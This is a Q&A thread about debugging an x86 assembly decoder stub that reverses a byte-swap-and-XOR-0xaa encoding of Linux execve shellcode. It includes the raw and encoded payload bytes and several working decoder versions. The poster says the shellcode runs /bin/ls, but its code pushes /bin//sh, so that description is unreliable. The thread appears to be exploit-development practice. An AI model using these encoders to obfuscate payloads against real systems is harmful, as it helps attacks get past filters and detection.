Intel x86 (IA32) assembly decoder stub for custom encoder not working as expected

Question

I have written a custom encoder which encodes my shellcode in this way:

First it reverses(swaps) all adjacent bytes in the original shellcode, and then it XORs each byte with value "0xaa" - I did all sanity check to ensure my original shellcode doesn't have this value, which might break my shellcode (by causing bad characters as a result of the encode). Output of my encoder:

Original Shellcode( 25 Bytes) :
0x31,0xc0,0x50,0x68,0x2f,0x2f,0x6c,0x73,0x68,0x2f,0x62,0x69,0x6e,0x89,0xe3,0x50,0x89,0xe2,0x53,0x89,0xe1,0xb0,0xb,0xcd,0x80,

Step1(Reverse adjacent Bytes)-Encoded Shellcode( 25 Bytes) :
0xc0,0x31,0x68,0x50,0x2f,0x2f,0x73,0x6c,0x2f,0x68,0x69,0x62,0x89,0x6e,0x50,0xe3,0xe2,0x89,0x89,0x53,0xb0,0xe1,0xcd,0xb,0x80,

Step2(XOR-each-BYTE-with-0xaa)-Encoded Shellcode( 25 Bytes) :
0x6a,0x9b,0xc2,0xfa,0x85,0x85,0xd9,0xc6,0x85,0xc2,0xc3,0xc8,0x23,0xc4,0xfa,0x49,0x48,0x23,0x23,0xf9,0x1a,0x4b,0x67,0xa1,0x2a,

My original shellcode's purpose: it just executes /bin/ls on Linux systems using the "execve" syscall. Full code:

global _start

section .text
_start:

        ; PUSH the first null dword
        xor eax, eax
        push eax


        ; PUSH //bin/sh (8 bytes)

        push 0x68732f2f
        push 0x6e69622f


        mov ebx, esp

        push eax
        mov edx, esp

        push ebx
        mov ecx, esp


        mov al, 11
        int 0x80

In order to execute the shellcode I'm practicing how to write a decoder stub, which will decode my custom encoded shellcode, and then execute it on a target machine.

This is my decoder stub assembly code:

global _start

section .text

_start:
        xor eax, eax
        xor ebx, ebx
        xor ecx, ecx
        xor edx, edx
        mov cl, 12

        jmp short call_decoder

; first : decode by XOR again with same value 0xaa
decode1:
        pop esi
        xor byte [esi], 0xaa
        jz decode2
        inc esi
        jmp short decode1

; second: rearrange the reversed adjacent BYTES, as part of encoding
decode2:
        pop esi
        mov bl, byte [esi + eax]
        mov dl, byte [esi + eax + 1]
        xchg bl, dl
        mov byte [esi + eax], bl
        mov byte [esi + eax + 1], dl
        add al, 2
        loop decode2
        ; execute Shellcode
        jmp short Shellcode

call_decoder:
        call decode1
        ; an extra byte 0xaa added at the end of encoded shellcode, as a marker to end of shellcode bytes.
        Shellcode: db 0x6a,0x9b,0xc2,0xfa,0x85,0x85,0xd9,0xc6,0x85,0xc2,0xc3,0xc8,0x23,0xc4,0xfa,0x49,0x48,0x23,0x23,0xf9,0x1a,0x4b,0x67,0xa1,0x2a,0xaa

But above code gives me a segment fault. I'm unable to find a failure point on gdb debugger. Need some help on what I'm doing wrong.

You must only pop esi once, not every time through both loops. Be sure not to clobber it in the first loop so you still have the value to use in the second loop. — prl, Dec 24 '21 at 11:18
In the second loop, you use ecx as a loop counter but you never initialized it to the length of the code. You can count the bytes in the first loop and set ecx to count/2. (Or use cmp eax, count.) — prl, Dec 24 '21 at 11:21
@prl thanks a lot. Not a lot of folks are interested in low level, nowadays. You are god send :). Such small mistakes, can be so problematic to debug in assembly language. It works perfect now. I'm pasting the updated code as an answer, referring your comments. — dig_123, Dec 24 '21 at 16:28

dig_123 · Accepted Answer · 2021-12-28T06:38:45.180

Based on comments made by @prl, these are the changes I did in my decoder stub, and now it works as expected:

global _start

section .text

; initialize registers
_start:
        xor eax, eax
        xor ebx, ebx
        xor ecx, ecx
        xor edx, edx
        mov cl, 12
        jmp short call_decoder

; set starting address of Shellcode in esi register
decoder:
        pop esi
        mov edi, esi

; first: decode by XOR again with same value 0xaa 
decode1:
        xor byte [edi], 0xaa
        jz decode2
        inc edi
        jmp short decode1

; second: rearrange the reversed adjacent BYTES, as part of encoding
decode2:
        mov bl, byte [esi + eax]
        mov dl, byte [esi + eax + 1]
        xchg bl, dl
        mov byte [esi + eax], bl
        mov byte [esi + eax + 1], dl
        add al, 2
        loop decode2

        jmp short Shellcode

call_decoder:
        call decoder
        Shellcode: db 0x6a,0x9b,0xc2,0xfa,0x85,0x85,0xd9,0xc6,0x85,0xc2,0xc3,0xc8,0x23,0xc4,0xfa,0x49,0x48,0x23,0x23,0xf9,0x1a,0x4b,0x67,0xa1,0x2a,0xaa

EDIT2 : A much concise and a better looking code - also no need to hardcode the length of Shellcode:

global _start

section .text

_start:
        xor eax, eax
        xor ebx, ebx
        xor ecx, ecx
        jmp short call_decoder

decoder:
        pop esi
        mov cl, codeLen
        dec cl

decode:
        cmp al, cl
        jz last_byte_odd
        xor byte [esi + eax], 0xaa
        mov bl, byte [esi + eax]
        xor byte [esi + eax + 1], 0xaa
        xchg byte [esi + eax + 1], bl
        mov byte [esi + eax], bl
        add al, 1
        cmp al, cl
        jz Shellcode
        add al, 1
        jmp short decode


last_byte_odd:
        xor byte [esi + eax], 0xaa
        jmp short Shellcode

call_decoder:
        call decoder
        Shellcode: db 0x6a,0x9b,0xc2,0xfa,0x85,0x85,0xd9,0xc6,0x85,0xc2,0xc3,0xc8,0x23,0xc4,0xfa,0x49,0x48,0x23,0x23,0xf9,0x1a,0x4b,0x67,0xa1,0x2a
        codeLen         equ $-Shellcode

I leave it up to the low level and shell-coding enthusiasts, to decipher the logic.

Why two separate loops? Looks like it would be way easier to `lodsw` / `xor ax, 0xaaaa` / `xchg ah,al` / `stosw`. if you're optimizing for code-size not speed. Or maybe `lodsd` / `xor eax, 0xaaaaaaaa` / `bswap eax` / `ror eax,16` (unswap words; byte pairs stay swapped) / `stosw`; that avoids a few `66` operand-size prefixes and is faster, but is larger overall. Or to save on pointer setup, of course you can just `lodsw` / ... / `mov [esi-2], ax`. Or `mov eax, [edi]` / ... on ax / `stosw`. (The load doesn't need an operand-size prefix; wider load is safe if the buffer isn't at end of page.) — Peter Cordes, Dec 24 '21 at 17:34
@Peter Cordes: After `ror eax, 16` you meant `stosd` not `stosw` — ecm, Dec 24 '21 at 18:20
@PeterCordes Can you explain a bit more. Full code, I tried( | is newline): `global _start|section .text|_start:|xor eax, eax|xor ecx, ecx|mov cl, 12|jmp short call_decoder|decoder:|pop esi|mov edi, esi|decode:|lodsw|xor ax, 0xaaaa|xchg ah, al|stosw|loop decode|jmp short Shellcode|call_decoder:|call decoder|Shellcode: db 0x6a,0x9b,0xc2,0xfa,0x85,0x85,0xd9,0xc6,0x85,0xc2,0xc3,0xc8,0x23,0xc4,0xfa,0x49,0x48,0x23,0x23,0xf9,0x1a,0x4b,0x67,0xa1,0x2a`. Gives `segmentation fault`. As I debug with gdb, lodsw works as expected, but stosw doesn't write content of ax back to edi. Am I missing something ? — dig_123, Dec 25 '21 at 09:18
Should work if all of that is in a writeable+executable segment, since you're effectively creating self-modifying code. If not, if you build normally, obviously a store into the `.text` section will fault when it's mapped read-only + exec. [Segfault when writing to string allocated by db \[assembly\]](https://stackoverflow.com/q/25124591) should be applicable — Peter Cordes, Dec 25 '21 at 11:55

Intel x86 (IA32) assembly decoder stub for custom encoder not working as expected

1 Answers1